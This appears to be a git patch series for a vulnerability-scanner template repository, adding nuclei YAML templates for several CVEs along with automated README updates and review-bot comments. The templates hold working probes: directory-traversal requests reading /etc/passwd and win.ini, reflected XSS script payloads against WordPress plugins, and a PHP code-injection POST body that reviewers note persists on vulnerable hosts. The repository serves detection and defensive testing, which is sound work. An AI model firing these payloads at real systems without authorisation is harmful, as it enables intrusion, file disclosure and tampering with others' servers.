From: GitHub Action Date: Fri, 16 Jul 2021 12:02:47 +0000 Subject: [PATCH 065/132] Auto Update README [Fri Jul 16 12:02:47 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 01cd40a7af..901734b061 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 440 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 441 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1565 files**. +**128 directories, 1566 files**. From 4238febae30396e470911768bd7dc1b984c4c9ed Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:33:02 +0530 Subject: [PATCH 066/132] Update CVE-2018-12031.yaml --- cves/2018/CVE-2018-12031.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml index 234cdfb650..783f92a2eb 100644 --- a/cves/2018/CVE-2018-12031.yaml +++ b/cves/2018/CVE-2018-12031.yaml @@ -4,6 +4,7 @@ info: name: Eaton Intelligent Power Manager 1.6 - Directory Traversal author: daffainfo severity: high + description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution. reference: | - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 
From 0f923915c9554b49da1c1cc6851fa0b6094a8f30 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:04:11 +0000 Subject: [PATCH 067/132] Auto Update README [Fri Jul 16 12:04:11 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 901734b061..37376e9821 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 441 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 442 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1566 files**. +**128 directories, 1567 files**. From 110a989ff1559476601a1857c63fc261ed9c56ac Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:36:12 +0530 Subject: [PATCH 068/132] Update CVE-2018-12031.yaml --- cves/2018/CVE-2018-12031.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml index 783f92a2eb..264af49d7a 100644 --- a/cves/2018/CVE-2018-12031.yaml +++ b/cves/2018/CVE-2018-12031.yaml @@ -15,12 +15,15 @@ requests: - method: GET path: - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini matchers-condition: and matchers: - type: regex regex: - "root:[0*]:0:0" + - "\\[(font|extension|file)s\\]" + condition: or part: body - type: status status: 
From 304ab07b28b03afd1415fdce40612517cacd67e3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:42:00 +0530 Subject: [PATCH 069/132] Update CVE-2018-12031.yaml --- cves/2018/CVE-2018-12031.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml index 264af49d7a..0fc4b182f1 100644 --- a/cves/2018/CVE-2018-12031.yaml +++ b/cves/2018/CVE-2018-12031.yaml @@ -15,7 +15,7 @@ requests: - method: GET path: - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd" - - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini + - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini" matchers-condition: and matchers: From 9ab9617b9575b64a0b0cfdc238fcbecaccf41c3a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:42:41 +0530 Subject: [PATCH 070/132] Update CVE-2019-16525.yaml --- cves/2019/CVE-2019-16525.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2019/CVE-2019-16525.yaml b/cves/2019/CVE-2019-16525.yaml index 23b3cdac75..3ff0907f88 100644 --- a/cves/2019/CVE-2019-16525.yaml +++ b/cves/2019/CVE-2019-16525.yaml @@ -4,6 +4,7 @@ info: name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code. reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525 tags: cve,cve2019,wordpress,xss,wp-plugin From f527e790e8892bf613fd1313a4d20d6182da0e14 Mon Sep 17 00:00:00 2001 
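Review bot: The added description says the issue affects versions `before 1.1.9`, while the template's `name` three lines above says `<= 1.1.5`; both bounds cannot be right, so one of them should be corrected against the NVD reference before this lands, otherwise a reader cannot tell which versions the match is meant to cover.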
From: GitHub Action Date: Fri, 16 Jul 2021 12:14:28 +0000 Subject: [PATCH 071/132] Auto Update README [Fri Jul 16 12:14:28 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 37376e9821..2f4963bdbf 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 442 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 443 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1567 files**. +**128 directories, 1568 files**. From 429bb01311ea967964cf2920178ac05cc3cd641a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:46:33 +0530 Subject: [PATCH 072/132] Update CVE-2016-10960.yaml --- cves/2016/CVE-2016-10960.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml index 2894158ab8..eeea3b13d7 100644 --- a/cves/2016/CVE-2016-10960.yaml +++ b/cves/2016/CVE-2016-10960.yaml @@ -15,13 +15,13 @@ requests: - method: POST path: - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php" - body: 'wsecure_action=update&publish=";} echo "Hello, world."; class WSecureConfig2 {var $test="' + body: 'wsecure_action=update&publish=";} echo "Hello, world CVE-2016-10960."; class WSecureConfig2 {var $test="' matchers-condition: and matchers: - type: word words: - - "Hello, world." + - "Hello, world CVE-2016-10960." condition: and - type: status status: 
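Review bot: The `publish` value in the POST body appears to be written into the plugin's config file (`wsecure_action=update` together with the `class WSecureConfig2` fragment suggests it is persisted as PHP), so unlike a read-only check this template leaves injected code on the target after the scan; that should be stated in the template so operators can opt out, e.g. an `intrusive` tag and a comment above `body:` such as `# state-changing: the payload is persisted into wsecure-config.php on a vulnerable host`. The follow-up in this series that swaps `echo` for `header(...)` (CVE-2016-10960, the next change to this file) has the same property.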
From f857247e84ec15b720132304d00182e14ad56fa9 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 19:17:49 +0700 Subject: [PATCH 073/132] Create CVE-2019-20085.yaml --- cves/2019/CVE-2019-20085.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2019/CVE-2019-20085.yaml diff --git a/cves/2019/CVE-2019-20085.yaml b/cves/2019/CVE-2019-20085.yaml new file mode 100644 index 0000000000..3e678c02f3 --- /dev/null +++ b/cves/2019/CVE-2019-20085.yaml @@ -0,0 +1,25 @@ +id: CVE-2019-20085 + +info: + name: TVT NVMS 1000 - Directory Traversal + author: daffainfo + severity: high + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 + - https://www.exploit-db.com/exploits/48311 + tags: cve,cve2019,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini" + + matchers-condition: and + matchers: + - type: regex + regex: + - "\\[(font|extension|file)s\\]" + part: body + - type: status + status: + - 200 From eaba7dc5defcf9fbc6db5818c8c53aa4e121f6ad Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:54:37 +0530 Subject: [PATCH 074/132] Update CVE-2016-10960.yaml --- cves/2016/CVE-2016-10960.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml index eeea3b13d7..68f7e2616c 100644 --- a/cves/2016/CVE-2016-10960.yaml +++ b/cves/2016/CVE-2016-10960.yaml 
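Review bot: The traversal path `{{BaseURL}}/../../../../../../../../../../../Windows/win.ini` relies on the literal `..` segments reaching the server; if the HTTP client or any proxy in the scan path collapses dot segments, the request degenerates to `/Windows/win.ini` and the template silently never matches. Percent-encoding the dot segments, or using the raw request format so the path is sent byte-for-byte, removes that ambiguity; worth confirming against a known-affected instance either way.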
@@ -15,14 +15,15 @@ requests: - method: POST path: - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php" - body: 'wsecure_action=update&publish=";} echo "Hello, world CVE-2016-10960."; class WSecureConfig2 {var $test="' + body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="' matchers-condition: and matchers: - type: word words: - - "Hello, world CVE-2016-10960." + - "Nuclei: CVE-2016-10960" condition: and + part: header - type: status status: - 200 From 17402e9f64ea1ed0754a3da5c267264ad56fbcd5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:27:47 +0000 Subject: [PATCH 075/132] Auto Update README [Fri Jul 16 12:27:47 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 2f4963bdbf..cb2a5b5166 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 443 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 444 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1568 files**. +**128 directories, 1569 files**. From 379345fc051689530a728cd11e694f83245e43ff Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:57:49 +0530 Subject: [PATCH 076/132] Update CVE-2019-20085.yaml --- cves/2019/CVE-2019-20085.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
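Review bot: `condition: and` on a matcher whose `words` list now holds the single entry `"Nuclei: CVE-2016-10960"` is a no-op and reads as if a second word were expected; either drop the `condition:` line or keep a second distinguishing word so the `and` means something. The new `part: header` is correct for a `header()`-set value and is the better choice over body matching.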
diff --git a/cves/2019/CVE-2019-20085.yaml b/cves/2019/CVE-2019-20085.yaml index 3e678c02f3..8d5916a7ae 100644 --- a/cves/2019/CVE-2019-20085.yaml +++ b/cves/2019/CVE-2019-20085.yaml @@ -1,7 +1,7 @@ id: CVE-2019-20085 info: - name: TVT NVMS 1000 - Directory Traversal + name: TVT NVMS 1000 - Directory Traversal author: daffainfo severity: high reference: | From 829507fd1e8cb18d06b9e9619aacaf69db1b1169 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:58:51 +0530 Subject: [PATCH 077/132] Update CVE-2019-20085.yaml --- cves/2019/CVE-2019-20085.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-20085.yaml b/cves/2019/CVE-2019-20085.yaml index 8d5916a7ae..1c31973d6b 100644 --- a/cves/2019/CVE-2019-20085.yaml +++ b/cves/2019/CVE-2019-20085.yaml @@ -4,10 +4,11 @@ info: name: TVT NVMS 1000 - Directory Traversal author: daffainfo severity: high + description: TVT NVMS-1000 devices allow GET /.. Directory Traversal reference: | - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 - https://www.exploit-db.com/exploits/48311 - tags: cve,cve2019,iot + tags: cve,cve2019,iot,lfi requests: - method: GET From 63ce91ad492df5a8cacff65d0a14f7c9e2f46cb7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:30:07 +0000 Subject: [PATCH 078/132] Auto Update README [Fri Jul 16 12:30:07 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index cb2a5b5166..7ea0b271ae 100644 --- a/README.md +++ b/README.md 
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 444 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 445 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1569 files**. +**128 directories, 1570 files**. From ba827f37c016c214440d62554fc0e234cd58a947 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:30:42 +0000 Subject: [PATCH 079/132] Auto Update README [Fri Jul 16 12:30:42 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7ea0b271ae..a1b212b721 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 445 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 446 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1570 files**. +**128 directories, 1571 files**. From 0efece2e2b32c2eac5f1fc884c303adb95e30529 Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Fri, 16 Jul 2021 12:35:28 +0000 Subject: [PATCH 080/132] Auto Update README [Fri Jul 16 12:35:28 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a1b212b721..09ff3b9208 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 446 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 449 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1571 files**. +**128 directories, 1575 files**. From 141993dafd28434188a14f5c4ebcac79d17e95d3 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:40:24 +0700 Subject: [PATCH 081/132] Create CVE-2009-1558.yaml --- cves/2009/CVE-2009-1558.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2009/CVE-2009-1558.yaml diff --git a/cves/2009/CVE-2009-1558.yaml b/cves/2009/CVE-2009-1558.yaml new file mode 100644 index 0000000000..f5f348890c --- /dev/null +++ b/cves/2009/CVE-2009-1558.yaml 
@@ -0,0 +1,23 @@ +id: CVE-2009-1558 + +info: + name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal + author: daffainfo + severity: high + reference: https://www.exploit-db.com/exploits/32954 + tags: cve,cve2009,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 3830a7805a11097ac4586969156a178466028c6c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:49:06 +0700 Subject: [PATCH 082/132] Create CVE-2016-1000128.yaml --- cves/2016/CVE-2016-1000128.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000128.yaml diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml new file mode 100644 index 0000000000..83fc34ed8d --- /dev/null +++ b/cves/2016/CVE-2016-1000128.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000128 + +info: + name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 6ee439eda2b02d2ae7393198c15ac0b8c81e568c Mon Sep 17 00:00:00 2001 
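Review bot: The regex matcher omits `part:`, while every other matcher block in this series states `part: body` explicitly; if the default is body this is harmless, but making it explicit (`part: body` under the regex list) keeps the templates uniform and avoids depending on the engine default. The `root:[x*]:0:0` form used here is the one the Eaton template earlier in the series should also adopt.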
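Review bot: As rendered in this hunk the body word matcher is `- ""`; if the expected reflected payload was lost in rendering this can be ignored, but an empty-string word matches every body, and combined with the `text/html` header and `200` status matchers the template would then fire on any WordPress site. The same `- ""` body matcher appears in the CVE-2016-1000129, -1000130, -1000131, -1000132, -1000133, -1000134 and -1000135 templates added later in this series, so whatever the intended string is should be verified once and applied to all of them.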
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:50:57 +0700 Subject: [PATCH 083/132] Create CVE-2016-1000129.yaml --- cves/2016/CVE-2016-1000129.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000129.yaml diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml new file mode 100644 index 0000000000..72991376fc --- /dev/null +++ b/cves/2016/CVE-2016-1000129.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000129 + +info: + name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 63d2932eac116aab9f2909949c91c3c4576d3682 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:52:56 +0700 Subject: [PATCH 084/132] Create CVE-2016-1000130.yaml --- cves/2016/CVE-2016-1000130.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000130.yaml diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml new file mode 100644 index 0000000000..f3fcc33305 --- /dev/null +++ b/cves/2016/CVE-2016-1000130.yaml 
@@ -0,0 +1,29 @@ +id: CVE-2016-1000130 + +info: + name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 4886bc48fd0258cecb34eef62a68c06ba1297a34 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 00:55:47 +0700 Subject: [PATCH 085/132] Create CVE-2016-1000131.yaml --- cves/2016/CVE-2016-1000131.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000131.yaml diff --git a/cves/2016/CVE-2016-1000131.yaml b/cves/2016/CVE-2016-1000131.yaml new file mode 100644 index 0000000000..1e540169b2 --- /dev/null +++ b/cves/2016/CVE-2016-1000131.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000131 + +info: + name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From e848640e9d213064ae2cec01e38434edac4ee144 Mon Sep 17 00:00:00 2001 
From: sandeep Date: Fri, 16 Jul 2021 23:27:01 +0530 Subject: [PATCH 086/132] Added CVE-2019-12616 --- cves/2019/CVE-2019-12616.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2019/CVE-2019-12616.yaml diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml new file mode 100644 index 0000000000..093014e337 --- /dev/null +++ b/cves/2019/CVE-2019-12616.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-12616 + +info: + name: phpMyAdmin CSRF + author: Mohammedsaneem + description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. + severity: medium + tags: cve,cve2019,phpmyadmin,csrf + reference: | + - https://www.phpmyadmin.net/security/PMASA-2019-4/ + - https://www.exploit-db.com/exploits/46982 + - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 + +requests: + - method: GET + path: + - "{{BaseURL}}/phpmyadmin/" + + matchers-condition: and + matchers: + - type: word + words: + - "4.6.6deb4+deb9u2" + - "phpMyAdmin" + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 0eb5990c06ef5e6f6aa7a0c5fcb85d3902fc7ac3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 17:59:09 +0000 Subject: [PATCH 087/132] Auto Update README [Fri Jul 16 17:59:09 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 09ff3b9208..7ee95f4c1c 100644 --- a/README.md +++ b/README.md 
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 449 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 450 | vulnerabilities | 235 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1575 files**. +**128 directories, 1576 files**. From e6cdaee59fdedfbb041e11a62edd81b8596c4ff8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 01:01:11 +0700 Subject: [PATCH 088/132] Create CVE-2016-1000132.yaml --- cves/2016/CVE-2016-1000132.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000132.yaml diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml new file mode 100644 index 0000000000..af30f2ca54 --- /dev/null +++ b/cves/2016/CVE-2016-1000132.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000132 + +info: + name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&msg=imported" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 
From 977b588c3c95dd882a96a61432980e5a55921240 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 01:06:22 +0700 Subject: [PATCH 089/132] Create CVE-2016-1000133.yaml --- cves/2016/CVE-2016-1000133.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000133.yaml diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml new file mode 100644 index 0000000000..9a682352a7 --- /dev/null +++ b/cves/2016/CVE-2016-1000133.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000133 + +info: + name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%22%20%3C%2Fscript%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 89cd375576fd0057d20a76b140911860acc73d31 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 17 Jul 2021 01:07:53 +0700 Subject: [PATCH 090/132] Create CVE-2016-1000134.yaml --- cves/2016/CVE-2016-1000134.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000134.yaml diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml new file mode 100644 index 0000000000..0a7af624f3 --- /dev/null +++ b/cves/2016/CVE-2016-1000134.yaml 
